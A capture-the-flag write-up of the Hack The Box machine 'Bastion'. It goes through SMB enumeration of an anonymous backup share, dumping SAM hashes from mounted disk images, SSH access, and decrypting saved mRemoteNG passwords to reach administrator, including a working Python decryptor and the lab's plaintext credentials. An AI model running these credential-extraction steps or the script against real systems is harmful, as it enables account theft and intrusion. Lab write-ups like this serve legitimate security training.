┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.134
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-13T08:33:59
|_ start_date: 2024-01-13T03:25:59
|_clock-skew: mean: -20m00s, deviation: 34m36s, median: -2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-13T09:33:57+01:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.36 seconds
Microsoft Windows RPC:
Before checking in the shares, I want to see if I can also get an anonymous session over RPC.
┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.10.134 -U ""
Password for [WORKGROUP\]:
Sure enough it works for RPC as well, and testing the srvinfo command, I was able to get information about the system.
rpcclient $> srvinfo
10.10.10.134 Wk Sv NT SNT
platform_id : 500
os version : 10.0
server type : 0x9003
As a result of both services allowing anonymous access, I decided to run enum4linux to gather info on the system while I manually check the Backups share.
┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.10.134
============================( Enumerating Workgroup/Domain on 10.10.10.134 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.134 )================================
Looking up status of 10.10.10.134
No reply from 10.10.10.134
===================================( Session Check on 10.10.10.134 )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
However, the enum4linux scan was not able to connect for some reason, so I will continue with enumerating the Backups share and then enumerate RPC manually if needed.
Enumeration: SMB Port 139/445/tcp
smbmap doesn’t give me much with a normal run, but will with a bad user name:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.134 -u exodus
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Unable to remove test file at \\10.10.10.134\Backups\ACQVOFRIGM.txt, please remove manually
[+] IP: 10.10.10.134:445 Name: 10.10.10.134 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
smbclient shows me the Backups share as well:
┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.134
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Backups Share:
Connecting to Backups, I see two files and a directory:
┌──(kali💀kali)-[~]
└─$ smbclient -N //10.10.10.134/backups
smb: \> ls
. D 0 Sat Jan 13 04:16:54 2024
.. D 0 Sat Jan 13 04:16:54 2024
ACQVOFRIGM.txt A 0 Sat Jan 13 04:16:54 2024
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1173744 blocks available
Once in the share I decided to grab all the files inside (big mistake – do NOT do this – mount it instead (instructions below))
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
The two virtual hard disk files are HUGE and were taking a long time to download, so I decided to check the other files that had already downloaded while I wait. Starting with note.txt…
cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
A Windows Image Backup is likely to be large and the transfer will be slow (as the note warns). Rather than try to copy it over, I’m going to mount this share to my filesystem. NOTE – To mount the share rather than downloading these huge files, use the following commands:
┌──(kali💀kali)-[~]
└─$ mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
┌──(kali💀kali)-[~]
└─$ ls /mnt/
I’ll list all the files in the share:
┌──(kali💀kali)-[~]
└─$ find /mnt/ -type f
I see two disk image vhd files.
Mount vhd:
I’m going to mount the virtual disk files and see what I can find in them. First, I’ll install guestmount with apt install libguestfs-tools, a tool for mounting virtual hard disk files on Linux.
Dump Hashes From Registry:
With full access to the file system, I have access to the registry files. These files can be locked when the system is running, but I won’t have that issue on a mounted drive. In the config directory where the registry hives are stored, I’ll use secretsdump.py to dump the password hashes:
┌──(kali💀kali)-[~/Desktop]
└─$ secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
I’ll also notice that secretsdump.py identified a default password (or autologon password) of “bureaulampje” for an unknown user.
Crack Hash:
Submitting the NTLM hashes to crackstation returns the same password for the l4mpje account:
bureaulampje
SSH:
Seeing ssh on a Windows box is a bit unusual, but this seems like a good chance to use it. I can ssh in as l4mpje:
In looking at the installed programs on the host, mRemoteNG jumps out as interesting:
PS C:\Program Files (x86)> dir
mRemoteNG is a remote connection management tool, and it allows the user to save passwords for various types of connections. There is a file in the user’s AppData directory, confCons.xml, that holds that information:
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG> dir
22-02-2019 15:03 6.316 confCons.xml
It’s xml, with encrypted versions of the passwords stored in the file:
I solved this box right when it was released, and the above file is what it was at that time. It seems that the file has been changed since then. It doesn’t matter, the results are the same. But if you see different values from what I have, that is why. The resulting passwords will be the same.
Extract Passwords:
Old Techniques
There’s a lot of articles like this and this that target an older version of the software that used a static key to decrypt the passwords. The Metasploit module abuses this as well. Starting in version 1.76, the user can now choose a master password, but there is still a default password of “mR3m”. But the default AES block mode also changed, which leaves all the older tools still incapable of decrypting newer files.
Method 1: From Within mRemoteNG
I’ll open my Commando VM and install mRemoteNG. Then I’ll drop the confCons.xml file from target into C:\Users\0xdf\AppData\Roaming\mRemoteNG and re-open mRemoteNG. I’ll see two connections listed:
mRemoteNG doesn’t want to just tell me the passwords. However, I can use the fact that the program wants to allow me to connect it to external tools that it may not be pre-programmed to work with by creating a new External Tool by going to Tools -> External Tools -> New External Tool. In the window that opens, I’ll add a display name, filename, and arguments as follows:
My external tool is just cmd, and I have it running an echo with the username and password. Now I can right-click on a connection, go to External Tools, and Password is an option: Clicking it pops a cmd window with the password at the top: The password for L4mpje matches what I already know. The password for DC is new:
Now I have the administrator password, “thXLHM96BeKL0ER2”.
Method 2: mremoteng-decrypt
Around the time Bastion came out, mremoteng-decrypt showed up on GitHub. At the time, there was only a java release, which I downloaded and ran here, and it worked:
root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
User Input: OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
Use default password for cracking...
Decrypted Output: bureaulampje
root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
User Input: V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
Use default password for cracking...
Decrypted Output: thXLHM96BeKL0ER2
I see now that there is a python script as well, though I haven’t played with it.
Method 3: Script It
At the time I was solving, there was only a java version on that GitHub, and I wanted a python version. So I wrote a quick script:
#!/usr/bin/env python3

import base64
import hashlib
import re
import sys
from Cryptodome.Cipher import AES

if len(sys.argv) != 2:
    print(f"[-] Usage: {sys.argv[0]} [confCons.xml]")
    sys.exit()

try:
    with open(sys.argv[1], 'r') as f:
        conf = f.read()
except FileNotFoundError:
    print(f"[-] Unable to open {sys.argv[1]}")
    sys.exit()

# Only the 1.76+ format (AES-GCM) is handled; older CBC files need the old tools
mode = re.findall(r'BlockCipherMode="(\w+)"', conf)
if len(mode) != 1:
    print("[-] Warning - No BlockCipherMode detected")
elif mode[0] != 'GCM':
    print(f"[-] Warning - This script is for AES GCM Mode. {mode} detected")

nodes = re.findall('<Node .+/>', conf)
if len(nodes) > 0:
    print(f"[+] Found nodes: {len(nodes)}\n")
else:
    print("[-] Found no nodes")

for node in nodes:
    user = re.findall(r' Username="(\w*)"', node)[0]
    enc = base64.b64decode(re.findall(' Password="([^ ]+)"', node)[0])
    # Blob layout: salt(16) | nonce(16) | ciphertext | GCM tag(16)
    salt = enc[:16]
    nonce = enc[16:32]
    cipher = enc[32:-16]
    tag = enc[-16:]
    # Key is PBKDF2-HMAC-SHA1 over the default master password "mR3m"
    key = hashlib.pbkdf2_hmac("sha1", b"mR3m", salt, 1000, dklen=32)
    aes = AES.new(key, AES.MODE_GCM, nonce=nonce)
    aes.update(salt)  # the salt is also the GCM associated data
    password = aes.decrypt_and_verify(cipher, tag).decode()
    print(f"Username: {user}\nPassword: {password}\n")
It takes a confCons.xml file, and prints all the decrypted passwords it can find.
administrator@BASTION C:\Users\Administrator>systeminfo
Host Name: BASTION
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA445
Original Install Date: 22-2-2019, 12:36:53
System Boot Time: 13-1-2024, 04:25:37
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12-12-2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: nl;Dutch (Netherlands)
Input Locale: en-us;English (United States)
Time Zone: (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 4.095 MB
Available Physical Memory: 3.043 MB
Virtual Memory: Max Size: 6.849 MB
Virtual Memory: Available: 5.729 MB
Virtual Memory: In Use: 1.120 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB3192137
[02]: KB4485447
[03]: KB4487006
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.134
[02]: fe80::4ccf:8d87:55e6:b8cb
[03]: dead:beef::4ccf:8d87:55e6:b8cb
[04]: dead:beef::101
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
administrator@BASTION C:\Users\Administrator> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
administrator@BASTION C:\Users\Administrator>net users
User accounts for \\BASTION
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
L4mpje
The command completed successfully.